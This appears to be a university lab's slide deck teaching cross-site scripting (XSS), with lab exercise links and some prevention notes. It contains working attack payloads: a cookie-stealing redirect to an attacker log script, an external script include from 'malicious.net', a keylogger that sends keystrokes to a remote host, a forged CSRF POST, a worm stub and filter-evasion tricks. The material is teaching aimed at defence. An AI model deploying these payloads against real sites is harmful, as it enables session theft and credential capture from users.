XSS: Cross-Site Scripting Louis Feuvrier — [email protected] Bruno Pujos — [email protected] Pierre Rovis — [email protected] LSE, EPITA Systems Lab. http://lse.epita.fr/ Introduction Attack vectors Prevention & Evasion Table of Contents 1 Introduction Introduction Examples Stored, Reflected, DOM XSS Exercise 2 Attack vectors Cookie Stealing CSRF XSS Worms Keylogger 3 Prevention & Evasion Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Introduction Goal: execute script on the client side Abuse user’s trust for a website (contrary to csrf) Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Basic Example <script>alert(’Warning! XSS!’)</script> Most basic example ever Both HTML and Javascript Most used detection snippets: alert(’xss’); document.write(’xss’); Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Foreign script <script src=’http://malicious.net/dobad.js’></script> Ability to execute bigger script than text field Enable updating of the script after posting Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Attribute Example <body onload="alert(’xss’);"></body> Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Stored XSS Javascript code stored on website’s servers Permanent, affects all users exposed to given database, logs... Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Reflected XSS Included in the input sent to the website by the user Possible because of excess of trust from the user Targeted XSS to 1 user in particular Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Introduction Examples Stored, Reflected, DOM XSS Exercise Exercise: basic stored XSS Exercise: basic stored XSS http://louis.feuvrier.org/supinternet/xss101.zip http://louis.feuvrier.org/supinternet/xss101.tar.gz Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger Quick list Cookie stealing CSRF XSS Worms Keylogging ... Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger Cookie stealing Retrieval of the administrator cookie to steal session Injection point http://someblog.com/guestbook.php Hosted cookie logger script at http://addr/log.php <script> location.href=’http://addr/log.php?val=’+document.cookie </script> Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger CSRF As seen previously Forge POST form var post_data = ’name=value’; var xmlhttp = new XMLHttpRequest(); // on Mozilla // new ActiveXObject("Microsoft.XMLHTTP"); on IE xmlhttp.open("POST", ’http://url/path/file.ext’, true); // ... xmlhttp.send(post_data); Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger XSS Worms Self replicating Samy Worm <script id=worm> balise = document.getElementById(’worm’); var str = unescape(’<script id=worm>’); str = str.concat(balise.innerHTML); str = str.concat(unescape(’</script>’)); alert(str); </script> Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger Keylogger Sometimes useful to retrieve passwords instead of cookies var keys = ’’; document.onkeypress = function(e) { // ... var key = get.keyCode ? get.keyCode : get.charCode; keys += key; } window.setInterval(function() { new Image().src = ’http://key.log/ger.php?keys=’ + keys; keys = ’’ }, 10000) Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Cookie Stealing CSRF XSS Worms Keylogger Exercise: basic reflected XSS Exercise: basic stored XSS http://louis.feuvrier.org/supinternet/xss102.zip http://louis.feuvrier.org/supinternet/xss102.tar.gz Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Quick list magic quotes htmlspecialchars htmlentities ... Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion magic quotes <script>alert(’xss’)</script> <script>alert(String.fromCharCode(88, 83, 83))</script> Length problem for long strings and limited input capabilities Solved with foreign scripting If Domain Name to foreign script too long, use IP address Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion htmlspecialchars Use htmlspecialchars everywhere, all problems solved Except... <?php $userinput = "javascript:alert(String.fromCharCode(88, 83, 83));"; $sanitized = htmlspecialchars($userinput); ?> <body onload="<?php echo $sanitized; ?> ">this is my webpage!</body> Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Questions? Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting Introduction Attack vectors Prevention & Evasion Exercise: XSS 103 Exercise: XSS 103 http://louis.feuvrier.org/supinternet/xss103.zip http://louis.feuvrier.org/supinternet/xss103.tar.gz Louis Feuvrier, Bruno Pujos, Pierre Rovis XSS: Cross-Site Scripting
© Copyright 2024 ExpyDoc
